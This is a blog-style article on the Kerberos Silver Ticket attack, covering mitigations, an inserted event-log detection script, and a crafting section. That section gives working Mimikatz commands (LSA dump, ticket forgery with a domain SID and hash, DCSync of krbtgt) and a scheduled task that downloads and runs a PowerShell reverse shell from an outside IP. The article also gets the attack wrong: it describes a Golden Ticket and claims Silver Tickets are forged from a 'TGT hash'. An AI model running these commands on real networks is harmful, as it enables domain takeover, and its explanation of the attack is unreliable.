Kerberos Silver Ticket Attack

As the digital landscape evolves, ensuring secure authentication has become paramount. Unfortunately, new threats constantly emerge, challenging the effectiveness of existing security measures.

One such threat is the Silver Ticket attack, a sophisticated technique that targets authentication systems.

This article aims to provide a detailed explanation of the Silver Ticket attack, including its methodology, potential impact, and mitigation strategies.

Silver Ticket Attack

What is the Kerberos Silver Ticket Attack?

The Silver Ticket attack is a type of advanced attack that targets the Kerberos authentication protocol, primarily used in Windows environments. Kerberos is responsible for authenticating users and services within a network and providing secure access to resources. The Silver Ticket attack abuses weaknesses in the Kerberos implementation to gain unauthorized access and impersonate legitimate users or services.

Methodology

The attack begins with an adversary gaining unauthorized access to the Key Distribution Center (KDC), which is the central authority responsible for issuing Kerberos tickets.

Through various means such as compromising a domain controller or exploiting vulnerabilities, the attacker acquires the necessary credentials to control the KDC.

Once in control of the KDC, the attacker generates a forged Kerberos Ticket Granting Ticket (TGT) known as a Silver Ticket.

This forged ticket contains arbitrary values for the user’s security identifier (SID) and group memberships, enabling the attacker to assume any identity they desire within the compromised domain.

With the Silver Ticket in hand, the attacker can request service tickets for any service within the domain, allowing them to access sensitive resources undetected.

By leveraging the compromised user’s credentials, the attacker can move laterally across the network, escalate privileges, and potentially gain control over critical systems.

Impact

The Silver Ticket attack poses significant risks to organizations, including:

  1. Unauthorized Access: Attackers can impersonate legitimate users or services, bypassing authentication mechanisms and gaining unrestricted access to sensitive information or systems.
  2. Data Breaches: Once inside the network, attackers can exploit their elevated privileges to exfiltrate sensitive data, compromising the confidentiality and integrity of critical information.
  3. Privilege Escalation: By assuming the identity of privileged users or services, attackers can escalate their privileges, potentially compromising the entire network infrastructure.

Mitigation Strategies

To protect against Silver Ticket attacks and enhance overall security, organizations can implement the following measures:

  1. Regular Patching: Keep all systems and software up to date with the latest security patches and updates. Vulnerabilities in the Kerberos implementation are often patched by vendors, reducing the risk of exploitation.
  2. Least Privilege Principle: Implement the principle of least privilege to restrict user and service access rights. Users should only be granted the minimum permissions required to perform their tasks, reducing the potential impact of compromised accounts.
  3. Monitoring and Detection: Implement robust monitoring and detection mechanisms to identify suspicious activities and unauthorized access attempts. Intrusion detection systems, anomaly detection, and log analysis can help in detecting Silver Ticket attacks.
  4. Two-Factor Authentication (2FA): Enable 2FA mechanisms to provide an additional layer of authentication security. By requiring a second form of authentication, such as a physical token or a one-time password, the effectiveness of the Silver Ticket attack can be greatly reduced.
  5. Security Awareness and Training: Educate employees and system administrators about the risks of Silver Ticket attacks and the importance of secure authentication practices. Regular training sessions can help in raising awareness and preventing successful attacks.
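As an added illustration of the Monitoring and Detection point above (example code, not from the original article): a forged service ticket is built offline and never issued by the KDC, so a Kerberos network logon on a member server with no corresponding service-ticket issuance (Event ID 4769) on the domain controller deserves a closer look. The event records, the host name fs01.corp.local, the NetBIOS domain CORP and the correlation window are constructed assumptions for the example.

```python
# Added example, not code from the original article. A Silver Ticket is forged
# offline from the service account's hash, so the KDC never issues it: a Kerberos
# network logon on a host with no matching 4769 on the DC is a red flag.
# All event records below are constructed sample data.
from datetime import datetime, timedelta

# Constructed DC events (4769 = Kerberos service ticket requested).
DC_EVENTS = [
    {"id": 4769, "time": "2024-05-01T09:00:05", "user": "alice@CORP.LOCAL",
     "service": "cifs/fs01.corp.local"},
    {"id": 4769, "time": "2024-05-01T09:10:00", "user": "bob@CORP.LOCAL",
     "service": "host/dc01.corp.local"},
]
# Constructed member-server fs01 events (4624, logon type 3, Kerberos package).
HOST_EVENTS = [
    {"id": 4624, "time": "2024-05-01T09:00:07", "user": "alice", "domain": "CORP",
     "logon_type": 3, "auth_package": "Kerberos"},
    {"id": 4624, "time": "2024-05-01T09:30:00", "user": "Administrator",
     "domain": "corp.local", "logon_type": 3, "auth_package": "Kerberos"},
]

def _ts(s):
    return datetime.fromisoformat(s)

def find_suspicious_kerberos_logons(host_events, dc_events, host="fs01.corp.local",
                                    netbios_domain="CORP", window_minutes=10):
    """Flag 4624 Kerberos network logons on `host` that no DC activity explains.
    Heuristics (assumptions for this example, tune per environment): no 4769 for
    the same user and an SPN on `host` within the preceding window, and a 4624
    domain field holding a FQDN instead of the NetBIOS name (a documented
    forged-ticket artifact)."""
    issued = [e for e in dc_events if e["id"] == 4769
              and e["service"].lower().endswith("/" + host.lower())]
    findings = []
    for ev in host_events:
        if not (ev["id"] == 4624 and ev["logon_type"] == 3
                and ev["auth_package"] == "Kerberos"):
            continue
        t, user = _ts(ev["time"]), ev["user"].lower()
        backed = any(i["user"].split("@")[0].lower() == user
                     and t - timedelta(minutes=window_minutes) <= _ts(i["time"]) <= t
                     for i in issued)
        reasons = []
        if not backed:
            reasons.append("no matching 4769 on DC")
        if ev["domain"].upper() != netbios_domain.upper():
            reasons.append("domain field is not the NetBIOS name")
        if reasons:
            findings.append({"user": ev["user"], "time": ev["time"], "reasons": reasons})
    return findings
```

In a real deployment the two event streams would come from a SIEM query over the DC's and the member server's Security logs; both heuristics produce false positives on their own, so treat a hit as a lead to investigate rather than a verdict.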

Crafting the Silver Ticket

Available Services

Service Type                                 Service Silver Tickets
WMI                                          HOST, RPCSS
PowerShell Remoting                          HOST, HTTP (depending on OS also: WSMAN, RPCSS)
WinRM                                        HOST, HTTP (on some occasions you can just ask for: WINRM)
Scheduled Tasks                              HOST
Windows File Share, also psexec              CIFS
LDAP operations, including DCSync            LDAP
Windows Remote Server Administration Tools   RPCSS, LDAP, CIFS
Golden Tickets                               krbtgt

  • The attacker creates a forged service ticket (Silver Ticket) using the TGT hash.
  • The Silver Ticket includes:
    • Target user’s Security Identifier (SID).
    • Target service’s SPN.
    • Desired privileges and access rights.
    • Ticket expiration time and other relevant data.
  • The attacker derives a session key for encryption from the TGT hash.
  • Using this key, the attacker encrypts the Silver Ticket.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

CIFS

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:7f5b4acaf5174b3282ac22e21e62FF22 /user:Administrator /ptt"'

Schedule a task

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.20.10:8080/Invoke-PowerShellTcp.psi''')'"

Execute a task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

LDAP

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Conclusion

The Silver Ticket attack represents a significant threat to authentication systems, exploiting vulnerabilities in the Kerberos protocol to gain unauthorized access.

Organizations must stay vigilant, implement robust security measures, and regularly update their systems to mitigate the risk of such advanced attacks.

By understanding the methodology behind the Silver Ticket attack and implementing appropriate mitigation strategies, organizations can strengthen their security posture and protect their sensitive data and resources.

It’s important to note that defending against Silver Ticket attacks involves securing the TGT hashes, implementing proper network segmentation, and monitoring for suspicious activities, such as unusual access patterns or unauthorized service ticket requests.

Please keep in mind that discussing or engaging in any form of cyberattacks or unauthorized activities is illegal and unethical. The information provided here is for educational purposes and to promote cybersecurity awareness.


What is a Silver Ticket attack?

A Silver Ticket attack is a type of cyberattack that targets the Kerberos authentication system.

How does a Silver Ticket attack work?

An attacker acquires a TGT hash, identifies the target service’s SPN, and uses the TGT hash to create a forged Silver Ticket.

What data is included in a Silver Ticket?

A Silver Ticket includes the target user’s Security Identifier (SID), the target service’s SPN, desired privileges, access rights, ticket expiration time, and other relevant data.
